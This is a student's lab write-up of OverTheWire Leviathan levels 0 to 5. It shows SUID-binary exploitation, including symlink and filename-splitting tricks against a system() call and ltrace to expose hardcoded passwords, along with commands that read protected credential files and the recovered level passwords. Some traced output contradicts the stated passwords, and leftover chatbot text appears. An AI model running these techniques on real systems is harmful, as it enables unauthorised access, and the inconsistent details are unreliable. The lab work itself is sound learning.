Summary of Lab Work

During our cybersecurity lab sessions, my friend Soham and I collaborated to complete different sets of challenges from OverTheWire's war games:

My Contribution:
 >Completed all levels of Leviathan.
 >Completed the last 17 levels of Natas (levels 18 to 34).
Soham's Contribution:
 >Completed all levels of Krypton.
 >Completed the first 17 levels of Natas (levels 0 to 17).

By working together and dividing the tasks efficiently, we were able to cover a wide range of topics including basic Linux commands, cryptography fundamentals, web security concepts, and vulnerability exploitation techniques.
LEVEL 0 --> LEVEL 1
Objective: Find the password for leviathan1.

Step-by-Step:
Connect to the server:
ssh leviathan0@leviathan.labs.overthewire.org -p 2223
After logging in, list files:
ls -la
Found a hidden directory:
cd .backup/
ls
Found a file:
bookmarks.html
Use cat to read it:
cat bookmarks.html
head bookmarks.html
cat bookmarks.html | grep leviathan
Password found: 3QJ3TgzHDq
Logic: Hidden files are often used to hide information. Using ls -la shows hidden files.

Password Found: 3QJ3TgzHDq

LEVEL 1 ➔ LEVEL 2
Objective: Retrieve the next password.

Step-by-Step:
Logged in:
ssh leviathan1@leviathan.labs.overthewire.org -p 2223
List files:
ls -la
Found a binary executable.
./check
Use strings to inspect binary:
strings ./check
Run the binary:
ltrace ./check
./check
enter password: sex
$ whoami
$ cat /etc/leviathan_pass/leviathan2


Logic: strings can reveal readable text inside binaries, often helping guess how to interact with them.

Password Found: NsN1HwFoyN

LEVEL 2 ➔ LEVEL 3 
Login: SSH: ssh leviathan2@leviathan.labs.overthewire.org -p 2223

Password: (Password was retrieved from Level 1)
Testing printfile: Running ./printfile without arguments showed the usage: Usage: ./printfile filename

I tried accessing a sensitive file /etc/leviathan_pass/leviathan3: ./printfile /etc/leviathan_pass/leviathan3 The output was: "You can't have that file..."

However, trying it with a readable file in the home directory, like .bash_logout, worked successfully and printed the content.

Deeper Analysis with ltrace: Using ltrace ./printfile .bash_logout, I observed the following key points:

The access function checks if the file is accessible by the user (leviathan2).

Then, snprintf prepares the command /bin/cat <filename>.

After setting the user ID with setreuid, the binary executes /bin/cat through the system call.

Important observation: access() checks the full filename properly, but system("/bin/cat <filename>") executes a shell command, which splits arguments on spaces. This creates an opportunity to manipulate the filename handling.

Testing with Space in Filename: I created a temporary directory with mktemp -d, e.g., /tmp/tmp.Q8CNm0O0C0. Inside it, I created a file with a space in the name: test file.txt.

When running: ./printfile /tmp/tmp.Q8CNm0O0C0/"test file.txt" access() succeeded because the full filename was passed. However, during system(), /bin/cat saw two arguments: test and file.txt, and tried to open them separately, which failed.

Exploitation: I took advantage of this behavior by:
Creating a symbolic link called test pointing to the restricted file /etc/leviathan_pass/leviathan3.
Leaving the dummy test file.txt file as it was.
Commands used
ln -s /etc/leviathan_pass/leviathan3 /tmp/tmp.Q8CNm0O0C0/test
chmod 777 /tmp/tmp.Q8CNm0O0C0 (to allow access)
Then I executed: ./printfile /tmp/tmp.Q8CNm0O0C0/"test file.txt"
Result: The program printed the contents of /etc/leviathan_pass/leviathan3,
revealing the password for the next level:
Password for leviathan3:f0n8h2iWLP
Conclusion: By exploiting how the system() function splits inputs on spaces, and using symbolic links, I bypassed the access restrictions and retrieved the password for Level 3.

LEVEL 3 ➔ LEVEL 4
Login:
SSH: ssh leviathan3@leviathan.labs.overthewire.org -p 2223

Password: (Password was retrieved from Level 2)

I executed the binary:
./level3
Enter the password> f0n8h2iWLP
bzzzzzzzzap. WRONG
The input password was rejected.
Deeper Analysis with ltrace:
Running ltrace ./level3 showed the following important information:
strcmp("h0no33", "kakaka") = -1
The program prompted for input with printf.
It read input using fgets.
It compared the user input to "snlprintf\n" using strcmp.
This meant the program was hardcoded to check the user input against "snlprintf\n".
(The \n is added because fgets captures the newline character.)

Thus, the correct password was likely snlprintf.
Exploitation:
I ran the program again:
./level3
Enter the password> snlprintf
This time, the program responded:

[You've got shell]!
I gained a shell as the user leviathan4.

I verified it using whoami:
leviathan4
Then, I retrieved the password for the next level:

bash
Copy code
cat /etc/leviathan_pass/leviathan4
Password obtained:
WG1egElCvO

Finally, I exited the shell and logged out.

Conclusion:
By using ltrace, I intercepted and observed internal string comparisons made by the binary. The hardcoded password was visible during tracing. Using it to authenticate, I successfully obtained a shell as leviathan4 and retrieved the password to progress to the next level.

LEVEL 4 ➔ LEVEL 5
Here’s the report again, **pure plain text** (no formatting, no bold, no extra symbols):

---

Leviathan Level 4 to Level 5 Report

Objective:  
Gain access to leviathan5 by exploiting the executable found in the .trash directory and find the password for the next level.

Tools Used:  
ls, cd, ./bin, echo, perl

Solution:  
The executable bin inside the .trash folder outputs a string of binary numbers. Converting this binary to ASCII reveals the password for leviathan5.

Step-by-Step Process:

1. List files in the home directory:  
ls -la  
Found the .trash directory.

2. Change into the .trash directory:  
cd .trash/

3. List files inside .trash:  
ls -la  
Found an executable bin with SUID permissions (owned by leviathan5).

4. Execute the bin file:  
./bin  
The output was a series of binary numbers:
00110000 01100100 01111001 01111000 01010100 00110111 01000110 00110100 01010001 01000100 00001010

5. Use echo and perl to decode the binary into text:  
echo 00110000 01100100 01111001 01111000 01010100 00110111 01000110 00110100 01010001 01000100 00001010 | perl -lpe '$_=pack"B*",$_'

6. The decoded output was:  
0dyxT7F4QD

7. Password for leviathan5 obtained:  
0dyxT7F4QD

8. Exit the session:  
exit

LEVEL 5 ➔ LEVEL 6
Objective:
Gain access to leviathan6 by exploiting the behavior of the leviathan5 executable and retrieve the password for the next level.

Tools Used:
ls, ./leviathan5, ltrace, touch, ln -s

Solution:
The binary tries to open and read from /tmp/file.log. By creating a symbolic link pointing to the password file, it reveals the password for leviathan6.

Step-by-Step Process:

List files in the home directory:
ls -la
Found the executable leviathan5 with SUID permissions (owned by leviathan6).

Execute the leviathan5 binary:
./leviathan5
The output showed: Cannot find /tmp/file.log

Use ltrace to inspect the binary:
ltrace ./leviathan5
Observed that the binary attempts to open /tmp/file.log.

Create an empty file at /tmp/file.log:
touch /tmp/file.log
Executed the binary again but no output was given.

Create a symbolic link from /tmp/file.log to the password file:
ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log

Execute the binary again:
./leviathan5
This time, it output the password:
szo7HDB88w

Password for leviathan6 obtained:
szo7HDB88w

Exit the session:
exit

 
